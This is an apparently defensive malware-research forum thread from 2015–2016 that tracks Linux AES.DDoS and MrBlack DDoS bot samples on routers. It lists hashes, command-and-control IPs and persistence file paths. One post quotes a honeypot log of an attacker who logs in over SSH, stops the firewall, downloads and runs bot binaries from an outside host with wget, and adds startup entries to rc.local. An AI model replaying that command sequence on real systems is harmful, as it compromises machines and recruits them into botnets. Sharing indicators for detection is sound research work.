Linux/AES.DDoS (alias Dofloo, MrBlack)

Forum for analysis and discussion about malware.
unixfreaxjp
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm

Sat Sep 19, 2015 8:16 am

Nice combination of Mr.Black & AES.DDoS in one panel.. :)
Image
Report:

Code: Select all

//  Name             Hashes                              MalwareName & Arch
    1. (2O16I1)    = c86fe64d074a7255968504be5aca8102 // mrblack.ddos ARM
    2. (312vt)     = 0005983da39751deb80264b10f7e16b0 // AES.DDoS ARM
    3. (scaqq)     = 60b25f9c03eca8dee74649d2f0ce3cf0 // AES.ddos ARM
// Files:
   2O16I1:   unpacked, ELF 32-bit LSB executable, ARM, EABI4 (SYSV), static, stripped
   312vt:     packed, ELF 32-bit LSB executable, ARM, EABI5 (GNU/Linux), static, stripped
   scaqq:     packed, ELF 32-bit LSB executable, ARM, EABI5 (GNU/Linux), static, stripped
cnc: 222.186.34.220 attacker: 60.166.61.110
You do not have the required permissions to view the files attached to this post.
unixfreaxjp
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm

Fri Sep 25, 2015 10:47 pm

Mr.Black in action :-)) Panic, hang & had to SIGKILL'ed in the middle of action :lol:
Image
I guess they miss "something" again..lol - never use/heard of "slackware" in crookland?
https://www.virustotal.com/en/file/db89 ... 443220303/
this sample is same as above post the 206*** one, it was re-attacking yesterday.
unixfreaxjp
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm

Wed Oct 14, 2015 9:49 pm

This is AES.DDoS router (ARM) version, NOT MrBlack < pls noted this although the route of codes for both malware are the same.
Attacker/panel: 59.56.110.233:8081
CNC (IP basis) 59.56.110.233 port 48080
CNC is open PoC:

Code: Select all

Thu Oct 15 06:39:21 JST 2015
233.110.56.59.in-addr.arpa [59.56.110.233] 48080 (http) open
Connection to 59.56.110.233 48080 port [tcp/48080] succeeded! 
Sample: https://www.virustotal.com/en/file/d0cc ... 444858548/
You do not have the required permissions to view the files attached to this post.
unixfreaxjp
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm

Wed Oct 14, 2015 11:21 pm

Mr.Black on MIPS x32/r3000 series arch routers
https://www.virustotal.com/en/file/1396 ... 444864491/

Code: Select all

Attacker & panel;: 1.93.19.203(panel port:6969)
CNC is ip address: 1.93.19.203 : 7878 / AS4808 CNCGROUP China169 Beijing
#MalwareMUSTDie!!
You do not have the required permissions to view the files attached to this post.
unixfreaxjp
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm

Thu Oct 15, 2015 10:17 pm

Double panel same payloads at 123.249.29.244 and 115.230.124.153 w/ ssh attacker from 115.230.124.153
Image
CNC is 123.249.29.244:11024

Code: Select all

Int Server...
connect to server...
---server 123.249.29.244:11024---
---server 123.249.29.244:11024 (4095605115:4139)---
(UNKNOWN) [123.249.29.244] 11024 (?) open
Connection to 123.249.29.244 11024 port [tcp/*] succeeded!
READAS.MMD-KICKASS-SCUM.ORG TCP ->123.249.29.244:11024 (ESTABLISHED)
https://www.virustotal.com/en/file/e1ea ... 444947243/
You do not have the required permissions to view the files attached to this post.
unixfreaxjp
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm

Tue Oct 20, 2015 2:16 am

This is AES.DDoSer, for ARM and intel
https://www.virustotal.com/en/file/5c56 ... 445306739/
https://www.virustotal.com/en/file/58f7 ... 445306725/
attack log:

Code: Select all

2015-10-20 10:12:28 sess/ip=2953,58.221.60.138] Remote SSH version: SSH-2.0-libssh2_1.4.3
2015-10-20 10:12:28 sess/ip=2953,58.221.60.138] kex alg, key alg: diffie-hellman-group1-sha1 ssh-rsa
2015-10-20 10:12:28 sess/ip=2953,58.221.60.138] outgoing: aes128-ctr hmac-sha1 none
2015-10-20 10:12:28 sess/ip=2953,58.221.60.138] incoming: aes128-ctr hmac-sha1 none
2015-10-20 10:12:29 sess/ip=2953,58.221.60.138] login attempt [admin/admin] succeeded
2015-10-20 10:12:33 sess/ip=2953,58.221.60.138] SHELL: /etc/init.d/iptables stop
2015-10-20 10:12:37 sess/ip=2953,58.221.60.138] SHELL: service iptables stop
2015-10-20 10:12:41 sess/ip=2953,58.221.60.138] SHELL: SuSEfirewall2 stop
2015-10-20 10:12:45 sess/ip=2953,58.221.60.138] SHELL: reSuSEfirewall2 stop
2015-10-20 10:12:49 sess/ip=2953,58.221.60.138] SHELL: cd /tmp
2015-10-20 10:12:53 sess/ip=2953,58.221.60.138] SHELL: wget -c http://58.221.60.138:50000/linux-arm
2015-10-20 10:12:57 sess/ip=2953,58.221.60.138] SHELL: chmod 777 linux-arm
2015-10-20 10:13:02 sess/ip=2953,58.221.60.138] SHELL: ./linux-arm &
2015-10-20 10:13:05 sess/ip=2953,58.221.60.138] SHELL: wget -c http://58.221.60.138:50000/Linux2.6
2015-10-20 10:13:19 sess/ip=2953,58.221.60.138] SHELL: chmod 777 Linux2.6
2015-10-20 10:13:19 sess/ip=2953,58.221.60.138] SHELL: ./Linux2.6 &
2015-10-20 10:13:19 sess/ip=2953,58.221.60.138] SHELL: echo "cd /tmp/">>/etc/rc.local
2015-10-20 10:13:26 sess/ip=2953,58.221.60.138] SHELL: echo "/etc/init.d/iptables stop">>/etc/rc.local
CNC checks, both are on same IP and ports as per attacker and its panel..

Code: Select all

linux-arm: ELF 32-bit LSB executable, ARM, version 1 (GNU/Linux), statically linked, stripped
538c8a700e6299258380b9d7eff4ee31 linux-arm
open temporary file /etc/sede1dRLk
open temporary file /etc/sednbbFbg
read /etc/rc.d/rc.local
read /etc/init.d/boot.local
Connecting to 58.221.60.138 50050 port ..
(UNKNOWN) 58.221.60.138 50050 (?) open
Connection to 58.221.60.138 50050 port succeeded!
TCP MMD-KICKS-AESDDOS->58.221.60.138:50050 (ESTABLISHED)
VERSONEX:MMD-KICKS-AESDDOS|0|0 MHz|XXXMB|XXXMB|Hacker
INFO:0.5%|0.0XX Mbps
INFO:0.6%|0.0XX Mbps
infection pace is high..
Image
#MalwareMustDie!!
You do not have the required permissions to view the files attached to this post.
User avatar
shibumi
Posts: 8
Joined: Tue Oct 14, 2014 1:48 pm
Location: Germany
Contact:

Fri Dec 04, 2015 7:02 pm

I've attached further Linux/Mrblack samples
You do not have the required permissions to view the files attached to this post.
unixfreaxjp
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm

Wed Feb 10, 2016 8:08 am

Memo:
AES.DDoS attack switch latest version (case switch 0x01 to 0x0C)
Image
Typical MO:

Code: Select all

/etc/sed[a-zA-Z0-9]{5}
/etc/rc.d/rc.local
/etc/init.d/boot.local
Network:

Code: Select all

CNC: 115.231.219.147:48080 (ip base) AS4134 ChinaNet-ZJ Shaoxing
PNL: 222.186.26.121:443 (hacked victim) AS23650 ChinaNet Jiangsu
Note:
Do make sig from this sample, and your product can detect all of the AES.DDoS varients correctly w/o mixing with MrBlack.
Reversing some flood techniques is good to mitigate them like this.

#MalwareMustDie
You do not have the required permissions to view the files attached to this post.
unixfreaxjp
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm

Mon Apr 18, 2016 11:23 am

You do not have the required permissions to view the files attached to this post.
Post Reply